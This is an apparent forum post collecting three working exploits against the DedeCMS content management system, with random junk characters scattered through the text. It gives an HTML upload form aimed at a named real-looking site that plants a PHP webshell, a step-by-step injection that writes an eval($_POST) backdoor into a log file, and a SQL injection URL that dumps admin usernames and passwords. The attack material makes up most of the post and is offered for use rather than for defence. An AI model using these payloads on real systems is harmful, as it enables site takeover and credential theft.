织梦(Dedecms)select_soft_post.php页面变量未初始漏洞; }& @) ~7 n4 K
<html>, j1 b: ^+ x1 q6 v- o
<head>
4 t1 ?; Y* J% X<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
5 B; r) ~. D0 b! S</head>
- O$ E$ R) H8 P5 A, T! [<body style="FONT-SIZE: 9pt">
; l, G5 T7 m0 `* U' a---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />8 t0 R! k; {3 l. i8 R5 m
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
! c. L9 Z1 z/ v) [+ _<input type='hidden' name='activepath' value='/data/cache/' />
1 f+ G) e! E5 A. F<input type='hidden' name='cfg_basedir' value='../../' />
/ d7 V+ a! l- Y$ H<input type='hidden' name='cfg_imgtype' value='php' /># }9 `0 {% R8 G+ C( X) c
<input type='hidden' name='cfg_not_allowall' value='txt' />
! m' o6 }7 r' n+ X<input type='hidden' name='cfg_softtype' value='php' />2 O9 h! Q7 _. Y9 f- i& ]7 C
<input type='hidden' name='cfg_mediatype' value='php' />
# Z( N* l; y3 `6 y6 K<input type='hidden' name='f' value='form1.enclosure' />
6 r' Q z* F; b<input type='hidden' name='job' value='upload' />6 g8 H/ d; p/ D/ l8 v1 ?
<input type='hidden' name='newname' value='fly.php' />/ e# k( l' F( k- ~) a+ W: W
Select U Shell <input type='file' name='uploadfile' size='25' />
$ b( y& t9 a: p4 V1 `: C" Y<input type='submit' name='sb1' value='确定' />
! C T' p7 }9 d/ J0 D3 S</form>
4 K3 h: k# n* v8 i& a. x<br />It's just a exp for the bug of Dedecms V55...<br />1 Q, @2 a, u8 ~+ i6 I, |
Need register_globals = on...<br />: k# L+ E1 {4 O: c# U4 V
Fun the game,get a webshell at /data/cache/fly.php...<br />% o9 l9 @% S. n
</body>0 ] a- I+ \4 K5 I* u3 d& ~
</html>
0 H) X! f+ j# o% h, w d! n
& H6 P4 l1 z3 v) g1 H2 g) ]7 `4 J5 {4 ]' M# \+ U
1 `7 r5 B( Q% d$ v% Q
7 g# ~. b" e2 M7 h) b% D1 C( O( o9 M5 L" `' K# A" v
+ f2 Q. E" n& ?3 E/ q# b9 @; J: D: o0 P# i
7 `) ?/ h4 y5 F2 b- ]8 w0 m6 f) Y
* M& j; a" d4 W& s! E% m% @+ A
% U( E) _0 u1 o* @ i2 P2 E( s# L
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞
1 Z$ N: \4 r& \0 @# X+ C$ [8 ?利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
1 y' \" x6 u1 a* V1. 访问网址:: B `- O8 |& h* i' T
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>3 w& R! ?) j" B) @* _; }
可看见错误信息
6 n+ Y; u8 t" }, z; d" l0 o& i3 m* {6 i( L9 L5 X* Q. g% a
: e9 [; N5 C+ d; ]7 z6 ]0 t7 N+ |2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。, _" V, E2 q/ J; m. a
int(3) Error: Illegal double '1024e1024' value found during parsing
$ S2 f. Q; V8 R. V9 ~+ n0 G( n6 lError sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
7 ~/ O M, [: v0 Q
, ?$ k/ B5 C( h
* B/ h" N8 Y, [/ A3 y3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是
- w9 G# H3 ^( K& B( N% ]
: H7 b R9 }( W9 @0 T9 ?3 j1 J- t
. q* R1 ?. ~! z5 K' H<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>
/ e# z e4 i1 J" ]! q+ V D# J4 q/ l/ S" [! D& k. t q6 i; a
3 W1 g! u) i& T" F8 Z5 P
按确定后的看到第2步骤的信息表示文件木马上传成功.
. i% I) ^* W b7 r' ?" x
0 r6 F' l4 a3 f* {. J) f4 C, A$ o s% U5 ^; D
9 H, D5 {6 s) \
0 A$ Z; e0 }2 f# I9 x7 \2 s
' F( `' A) ]. k# |4 S6 ^" |; C; w2 L
" `# g0 v8 h9 s* G! O4 w! f7 z8 |, w( g& V
; t3 T; r1 s! c& \2 r7 v0 t
% {3 f1 U! w" _5 M8 P/ j
' Y% m4 r! A) r9 `* V7 K: i' g A/ U$ T* K1 P$ L; P
织梦(DedeCms)plus/infosearch.php 文件注入漏洞# H2 w( h1 p9 [0 {! Q, P
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|
发表于 2012-10-18 10:42:14
收藏
支持
反对